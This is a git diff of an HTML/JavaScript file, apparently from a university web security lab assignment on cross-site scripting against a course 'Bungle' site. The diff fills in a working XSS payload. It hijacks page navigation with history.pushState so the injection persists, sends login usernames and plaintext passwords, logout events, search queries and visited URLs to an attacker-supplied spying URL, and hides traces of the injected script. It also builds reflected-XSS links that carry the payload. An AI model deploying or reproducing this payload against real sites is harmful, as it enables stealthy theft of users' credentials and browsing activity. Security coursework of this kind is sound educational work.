--- a/WebSec/2.2.3.html
+++ b/WebSec/2.2.3.html
@@ -13,7 +13,7 @@ function payload(attacker) {
 
     // This function can make it appear that a new page has been loaded
     // Note that you can proxy the main page, or a search page!
-	function proxy(href, spying_url) {
+	function proxy(href, spying_url, shouldPush = true) {
 
         	// Make all current HTML invisible.
         	$('html').hide();
@@ -25,12 +25,104 @@ function payload(attacker) {
                 $('html').show();
 
                 // TODO implement spying while being stealthy and persistent. Remove the alert.
-                alert("Notice that although we injected code into the search page, you see here the main page!")
+                //alert("Notice that although we injected code into the search page, you see here the main page!")
+                // <NEED TO USE PUSH STATE TO ENSURE THE HISTORY IS NOT SREWED UP>
+                if (shouldPush) {
+                    history.pushState(null, document.title, href)
+                }
 
+                // $(window).one('popstate', function(e) {
+                //     e.preventDefault();
+                //     var backLink = e.target.location.href;
+                //     proxy(backLink, spying_url);
+                // })
+
+                // addEventListener('popstate', function(e) {
+                //     e.preventDefault();
+                //     var backLink = e.target.location.href;
+                //     proxy(backLink, spying_url);
+                // }, {
+                //     once: true
+                // });
+                
+                window.onpopstate = function(e) {
+                    e.preventDefault();
+                    var backLink = e.target.location.href;
+                    console.log(e);
+                    console.log(backLink);
+                    proxy(backLink, spying_url, false);
+                }
+
+                const bar = document.createElement('div')
+                bar.style = "background-color: red; width: 100%; height: 50px;"
+                document.querySelector('div.navbar-default').prepend(bar);
+                    
+                var uName = $("#logged-in-user",this).text();
+                if (uName) {
+                    var sendLink = `${spying_url}?event=nav&user=${uName}&url=${document.location.href}`;
+                    $.get(sendLink);
+                } else {
+                    var sendLink = `${spying_url}?event=nav&url=${document.location.href}`;
+                    $.get(sendLink);
+                }
+
+                Array.from(document.getElementsByClassName('history-item')).forEach(function(link){
+                    var txt = $(link).text();
+                    if (txt.includes("<script>")){
+                        $(link).hide();
+                    }
+                });
+
+                // This is the login/register form
+                $('.well > .form-inline').submit(function(e) {
+                    e.preventDefault();
+                    //e.stopPropagation();
+                    var form = this;
+                    var uName = $("input[name='username']",this).val(); 
+                    var uPass = $("input[name='password']",this).val(); 
+                    console.log(uName,uPass);
+                    var spyLink = `${spying_url}?event=login&user=${uName}&pass=${uPass}`;
+                    console.log(spyLink);
+                    $.get(spyLink);
+                    $.post($(form).attr('action'), $(form).serialize(), function() {
+                        proxy('./', spying_url);
+                    });
+                })
+                // This is the logout form
+                $('.navbar-nav > .navbar-form').submit(function(e){
+                    e.preventDefault()
+                    var form = this;
+                    var uName = $("#logged-in-user",this).text();
+                    console.log(uName);
+                    var spyLink = `${spying_url}?event=logout&user=${uName}`;
+                    $.get(spyLink);
+                    $.post($(form).attr('action'), $(form).serialize(), function() {
+                        proxy('./', spying_url);
+                    });
+                })
+                // This is the search form
+                $('.search-well > .form-inline').submit(function(e){
+                    e.preventDefault();
+                    var form = this;
+                    var query = $('input[name=q]', this).val();
+                    console.log(query);
+                    const target_href = `./search?q=${query}`;
+                    const spyLink = `${spying_url}?event=search&q=${query}`;
+                    $.get(spyLink);
+                    proxy(target_href, spying_url);
+                });
+
+                $('a').click(function(e){
+                    e.preventDefault();
+                    var lnk = e.target.href;
+                    console.log(lnk);
+                    proxy(lnk,spying_url);
+                });
             });
     	}
     //Call Proxy
-	proxy('./', attacker)
+    history.replaceState(null, document.title, "./")
+    proxy('./', attacker)
 }
 
 function makeLink(target, attacker, defense) {
@@ -41,14 +133,16 @@ function makeLink(target, attacker, defense) {
     switch(defense) {
         case 1:
             // TODO: Implement XSS warmup 2.2.3.1
-            return  "http://bungle-cs461.csl.illinois.edu/multivac/?name=INSERT%20ATTACK%20HERE";
+            return  "http://bungle-cs461.csl.illinois.edu/multivac/?name=" + encodeURIComponent(
+                `<script>setTimeout(function(){document.getElementsByTagName("a")[0].href="http://ece.illinois.edu/";},10);`
+                + "</script" + ">");
         case 2:
             // TODO: generate XSS URL for defense level 2.2.3.2 (replace/extend this sample)
             return target + "/search?xssdefense=" + (defense-2) + "&q=" + 
                 encodeURIComponent(
                     "<script>" +
                     payload_string + 
-                    ";payload();" + 
+                    ";payload('"+attacker+"');" + 
                     "</script" + ">"
                 );
         case 3:
@@ -91,3 +185,4 @@ $(function() {
     <h3 id="defense6"></h3>
 </body>
 </html>
+
